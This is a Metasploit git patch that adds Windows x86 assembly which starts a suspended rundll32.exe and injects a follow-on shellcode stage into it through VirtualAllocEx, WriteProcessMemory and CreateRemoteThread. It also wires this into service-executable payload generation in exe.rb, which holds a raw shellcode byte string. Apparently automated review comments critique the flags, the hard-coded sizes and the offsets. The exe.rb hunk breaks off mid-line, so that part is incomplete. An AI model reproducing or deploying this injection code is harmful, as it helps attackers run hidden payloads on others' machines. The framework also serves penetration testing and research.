From 25d48b73009aca99a6665c10cec07d3d621b3de2 Mon Sep 17 00:00:00 2001
From: Florian Gaultier
Date: Fri, 3 Jan 2014 12:16:37 +0100
Subject: [PATCH] Add create_remote_process block, now used in exe_service generation
---
 .../src/block/block_create_remote_process.asm | 82 +++++++++++++++++++
 .../single/single_create_remote_process.asm | 17 ++++
 .../x86/src/single/single_service_stuff.asm | 3 +-
 lib/msf/util/exe.rb | 32 +++++---
 4 files changed, 123 insertions(+), 11 deletions(-)
 create mode 100644 external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
 create mode 100644 external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
new file mode 100644
index 0000000000..d28a4eee10
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
@@ -0,0 +1,82 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+xor edi, edi
+push 0x00000004 ;PAGE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION
+push edi
+push 0xE553A458 ;call VirtualAlloc()
+call ebp
+
+mov dword [eax], 0x44
+lea esi, [eax+0x44]
+push edi
+push 0x6578652e
+push 0x32336c6c
+push 0x646e7572
+mov ecx, esp ;"rundll32.exe"
+push esi ;lpProcessInformation
+push eax ;lpStartupInfo
+push edi ;lpCurrentDirectory
+push edi ;lpEnvironment
+push 0x00000044 ;dwCreationFlags
+push edi ;bInheritHandles
+push edi ;lpThreadAttributes
+push edi ;lpProcessAttributes
+push ecx ;lpCommandLine
+push edi ;lpApplicationName
+push 0x863FCC79
+call ebp ;call CreatProcessA()
+
+mov ecx, [esi]
+push 0x00000040 ;PAGE_EXECUTE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00001000 ;Next Shellcode Size
+push edi
+push ecx ;hProcess
+push 0x3F9287AE ;call VirtualAllocEx()
+call ebp
+
+mov edi, eax
+mov ecx, [esi]
+lea edx, [ebp+0x12a] ;pointer on the next shellcode
+push esp
+push 0x00001000 ;Next Shellcode Size
+push edx ;
+push eax ;lBaseAddress
+push ecx ;hProcess
+push 0xE7BDD8C5
+call ebp ;call WriteProcessMemory()
+
+xor eax, eax
+mov ecx, [esi]
+push eax ;lpThreadId
+push eax ;dwCreationFlags
+push eax ;lpParameter
+push edi ;lpStartAddress
+push eax ;dwStackSize
+push eax ;lpThreadAttributes
+push ecx ;hProcess
+push 0x799AACC6
+call ebp ;call CreateRemoteThread()
+
+mov ecx, [esi]
+push ecx
+push 0x528796C6
+call ebp ;call CloseHandle()
+
+mov ecx, [esi+0x4]
+push ecx
+push 0x528796C6
+call ebp ;call CloseHandle()
+
+push edi
+push 0x56A2B5F0
+call ebp ;call ExitProcess(0)
\ No newline at end of file
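Review bot: The `push 0x00000044 ;dwCreationFlags` before the CreateProcessA call decodes to CREATE_SUSPENDED (0x4) | IDLE_PRIORITY_CLASS (0x40), and since the same 0x44 is stored as the STARTUPINFO `cb` field in `mov dword [eax], 0x44` a few lines above, it is not clear the 0x40 bit was chosen deliberately; the comment should name the flags actually intended, e.g. `;dwCreationFlags = CREATE_SUSPENDED (confirm 0x40 is wanted)`. The stage size is hard-coded as 0x1000 in both the VirtualAllocEx and WriteProcessMemory calls (`;Next Shellcode Size`), which silently caps the appended stage at 4096 bytes and makes WriteProcessMemory read 4096 bytes from `ebp+0x12a` whatever its real length — that value deserves an `equ` and the cap belongs in the header comment, alongside a note that no API return value is checked (a NULL from VirtualAlloc faults at `mov dword [eax], 0x44`). The `lea edx, [ebp+0x12a]` displacement is only correct for a fixed amount of code between api_call and the end of this block, so when block_service is included ahead of it (single_service_stuff.asm) it has to be rewritten, which the exe.rb hunk appears to do; that coupling should be stated on the lea line. The header's `; Size: 137 bytes` does not match the encoded length of the instructions below (about 160 bytes by my count), and `;call CreatProcessA()` is missing an `e`.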
diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
new file mode 100644
index 0000000000..1b73bb1abc
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
@@ -0,0 +1,17 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 189 bytes + strlen(libpath) + 1
+; Build: >build.py single_create_remote_process
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+ pop ebp ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_create_remote_process.asm"
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
index e63119c276..40cd4cd111 100644
--- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
+++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
@@ -14,4 +14,5 @@
 %include "./src/block/block_api.asm"
 start: ;
 pop ebp ; pop off the address of 'api_call' for calling later.
-%include "./src/block/block_service.asm"
\ No newline at end of file
+%include "./src/block/block_service.asm"
+%include "./src/block/block_create_remote_process.asm"
\ No newline at end of file
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index e52fc625a4..ea17a5bb19 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
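Review bot: The header lines `; Version: 1.0 (28 July 2009)` and `; Size: 189 bytes + strlen(libpath) + 1` look carried over from another stub: nothing in this file takes a libpath, and the only variable part is the fixed-size block it includes. Replace them with the actual assembled size (or drop the Size line), because the included block's `ebp+0x12a` next-stage displacement depends on exactly this `cld` / `call start` / block_api / `pop ebp` layout and a reader verifying that displacement will start from this header.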
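Review bot: Including block_create_remote_process after block_service changes what `ebp+0x12a` inside the included block points to, because block_service now sits between api_call and the end of the injector, and that displacement is only right for the single_create_remote_process layout. If lib/msf/util/exe.rb rewrites the displacement for this stub (its hunk computes a `shellcode_code_offset`), say so on the new include line, e.g. `; next-stage displacement in this block is patched by lib/msf/util/exe.rb`, so nobody assumes the stub assembled here works unmodified. The enclosing file starts outside the hunk.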
@@ -524,6 +524,9 @@ require 'msf/core/exe/segment_injector' precode_size -= 0x0d svcctrlhandler_code_offset = precode_size + pushed_service_name.length + precode_size += 0xe4 + shellcode_code_offset = precode_size + (pushed_service_name.length * 2) + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -536,16 +539,25 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1\x8D\x85" + - [svcmain_code_offset].pack('
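Review bot: In the first hunk, the added `precode_size += 0xe4` and `shellcode_code_offset = precode_size + (pushed_service_name.length * 2)` are byte offsets into the literal code_service blob below, and nothing says what sits at that offset (presumably the next-stage displacement inside block_create_remote_process, after two inlined copies of the service name — confirm against the .asm sources). A one-line comment such as `# offset of the next-stage displacement in block_create_remote_process, after both inlined copies of the service name` would make the constant checkable when the shellcode is rebuilt. The neighbouring `precode_size -= 0x0d` / `svcctrlhandler_code_offset` lines follow the same pattern, so this is consistent with the file but one more unnamed constant tied to the blob; the enclosing method starts and ends outside the hunk.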